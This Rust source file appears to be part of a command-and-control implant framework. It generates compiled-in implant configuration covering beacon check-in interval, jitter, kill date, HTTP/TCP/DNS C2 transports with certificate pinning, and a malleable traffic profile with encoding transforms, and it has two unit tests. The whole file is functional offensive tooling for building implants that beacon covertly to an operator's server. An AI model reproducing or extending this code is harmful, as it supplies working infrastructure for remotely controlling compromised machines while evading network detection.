//! Configuration baking - generates Rust code from config

use crate::profile::MalleableProfile;
use crate::profile_compile::compile_profile;
use crate::types::*;
use sha2::{Digest, Sha256};
use std::io::Write;

/// Bake configuration into Rust source code
pub fn bake_config(config: &ImplantConfig) -> String {
    let mut output = String::new();

    output.push_str("// Auto-generated implant configuration\n");
    output.push_str("// DO NOT EDIT - generated by config crate\n\n");

    // Generate config hash
    let config_json = serde_json::to_string(config).unwrap_or_default();
    let mut hasher = Sha256::new();
    hasher.update(config_json.as_bytes());
    let hash = hasher.finalize();
    let hash_hex: String = hex::encode(hash);

    // Generate the CONFIG static
    output.push_str("pub static CONFIG: Config = Config {\n");

    // Server public key
    output.push_str(&format!(
        "    server_public_key: hex_literal::hex!(\"{}\"),\n",
        config.server_public_key
    ));

    // Config hash
    output.push_str(&format!("    hash: hex_literal::hex!(\"{}\"),\n", hash_hex));

    // Timing
    output.push_str(&format!(
        "    checkin_interval: {},\n",
        config.checkin_interval
    ));
    output.push_str(&format!("    jitter_percent: {},\n", config.jitter_percent));
    output.push_str(&format!("    max_retries: {},\n", config.max_retries));
    output.push_str(&format!("    kill_date: {},\n", config.kill_date));

    // Transports
    output.push_str("    transports: &[\n");
    for transport in &config.transports {
        output.push_str("        TransportConfig {\n");
        output.push_str(&format!(
            "            transport_type: TransportType::{:?},\n",
            transport.transport_type
        ));
        output.push_str(&format!(
            "            address: \"{}\",\n",
            escape_string(&transport.address)
        ));
        if let Some(pin) = &transport.cert_pin {
            output.push_str(&format!("            cert_pin: Some(\"{}\"),\n", pin));
        } else {
            output.push_str("            cert_pin: None,\n");
        }
        // DNS-specific configuration
        if let Some(dns) = &transport.dns {
            output.push_str(&format!(
                "            dns_domain: Some(\"{}\"),\n",
                escape_string(&dns.domain)
            ));
            output.push_str(&format!(
                "            dns_timeout_secs: {},\n",
                dns.timeout_secs
            ));
            output.push_str(&format!(
                "            dns_max_retries: {},\n",
                dns.max_retries
            ));
        } else {
            output.push_str("            dns_domain: None,\n");
            output.push_str("            dns_timeout_secs: 5,\n");
            output.push_str("            dns_max_retries: 3,\n");
        }
        output.push_str("        },\n");
    }
    output.push_str("    ],\n");

    // Profile
    output.push_str("    profile: Profile {\n");
    output.push_str(&format!(
        "        user_agent: \"{}\",\n",
        escape_string(&config.profile.user_agent)
    ));
    output.push_str(&format!(
        "        checkin_uri: \"{}\",\n",
        escape_string(&config.profile.checkin_uri)
    ));
    output.push_str(&format!(
        "        task_uri: \"{}\",\n",
        escape_string(&config.profile.task_uri)
    ));
    output.push_str(&format!(
        "        request_transform: Transform::{:?},\n",
        config.profile.request_transform
    ));
    output.push_str(&format!(
        "        response_transform: Transform::{:?},\n",
        config.profile.response_transform
    ));
    output.push_str("    },\n");

    output.push_str("};\n\n");

    // Generate type definitions
    output.push_str(BAKED_TYPES);

    output
}

fn escape_string(s: &str) -> String {
    s.replace('\\', "\\\\").replace('"', "\\\"")
}

/// Load configuration from TOML file
pub fn load_config(path: &str) -> Result<ImplantConfig, Box<dyn std::error::Error>> {
    let content = std::fs::read_to_string(path)?;
    let config: ImplantConfig = toml::from_str(&content)?;
    Ok(config)
}

/// Write baked config to file
pub fn write_baked_config(
    config: &ImplantConfig,
    out_path: &str,
) -> Result<(), Box<dyn std::error::Error>> {
    let code = bake_config(config);
    let mut file = std::fs::File::create(out_path)?;
    file.write_all(code.as_bytes())?;
    Ok(())
}

/// Bake configuration with malleable profile
pub fn bake_config_with_profile(
    config: &ImplantConfig,
    profile: &MalleableProfile,
) -> String {
    let mut output = bake_config(config);

    // Add malleable profile
    output.push_str("\n// === Malleable Profile ===\n");
    output.push_str(&compile_profile(profile));

    output
}

/// Write baked config with malleable profile to file
pub fn write_baked_config_with_profile(
    config: &ImplantConfig,
    profile: &MalleableProfile,
    out_path: &str,
) -> Result<(), Box<dyn std::error::Error>> {
    let code = bake_config_with_profile(config, profile);
    let mut file = std::fs::File::create(out_path)?;
    file.write_all(code.as_bytes())?;
    Ok(())
}

/// Load malleable profile from TOML file
pub fn load_profile(path: &str) -> Result<MalleableProfile, Box<dyn std::error::Error>> {
    MalleableProfile::from_file(path)
}

const BAKED_TYPES: &str = r#"
/// Baked configuration structure
pub struct Config {
    pub server_public_key: [u8; 32],
    pub hash: [u8; 32],
    pub checkin_interval: u32,
    pub jitter_percent: u32,
    pub max_retries: u32,
    pub kill_date: u64,
    pub transports: &'static [TransportConfig],
    pub profile: Profile,
}

/// Baked transport configuration
pub struct TransportConfig {
    pub transport_type: TransportType,
    pub address: &'static str,
    pub cert_pin: Option<&'static str>,
    /// DNS C2 domain (only used for DNS transport)
    pub dns_domain: Option<&'static str>,
    /// DNS query timeout in seconds
    pub dns_timeout_secs: u64,
    /// DNS max retries per operation
    pub dns_max_retries: usize,
}

/// Transport type
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum TransportType {
    Http,
    Https,
    Tcp,
    Dns,
}

/// Baked profile
pub struct Profile {
    pub user_agent: &'static str,
    pub checkin_uri: &'static str,
    pub task_uri: &'static str,
    pub request_transform: Transform,
    pub response_transform: Transform,
}

/// Transform type
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Transform {
    None,
    Base64,
    Base64Url,
    Hex,
}

impl Profile {
    pub fn encode_request(&self, data: &[u8]) -> Vec<u8> {
        match self.request_transform {
            Transform::None => data.to_vec(),
            Transform::Base64 => {
                use base64::{Engine, engine::general_purpose::STANDARD};
                STANDARD.encode(data).into_bytes()
            }
            Transform::Base64Url => {
                use base64::{Engine, engine::general_purpose::URL_SAFE};
                URL_SAFE.encode(data).into_bytes()
            }
            Transform::Hex => {
                hex::encode(data).into_bytes()
            }
        }
    }

    pub fn decode_response(&self, data: &[u8]) -> Result<Vec<u8>, &'static str> {
        match self.response_transform {
            Transform::None => Ok(data.to_vec()),
            Transform::Base64 => {
                use base64::{Engine, engine::general_purpose::STANDARD};
                STANDARD.decode(data).map_err(|_| "base64 decode failed")
            }
            Transform::Base64Url => {
                use base64::{Engine, engine::general_purpose::URL_SAFE};
                URL_SAFE.decode(data).map_err(|_| "base64url decode failed")
            }
            Transform::Hex => {
                hex::decode(data).map_err(|_| "hex decode failed")
            }
        }
    }
}
"#;

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_bake_default_config() {
        let config = ImplantConfig {
            server_public_key: "0".repeat(64), // 32 bytes in hex
            ..Default::default()
        };

        let code = bake_config(&config);

        assert!(code.contains("pub static CONFIG"));
        assert!(code.contains("server_public_key"));
        assert!(code.contains("TransportType::Https"));
    }

    #[test]
    fn test_config_hash_changes() {
        let mut config1 = ImplantConfig::default();
        config1.server_public_key = "a".repeat(64);

        let mut config2 = ImplantConfig::default();
        config2.server_public_key = "b".repeat(64);

        let code1 = bake_config(&config1);
        let code2 = bake_config(&config2);

        // Extract hash lines
        let hash1 = code1.lines().find(|l| l.contains("hash:")).unwrap();
        let hash2 = code2.lines().find(|l| l.contains("hash:")).unwrap();

        assert_ne!(hash1, hash2);
    }
}
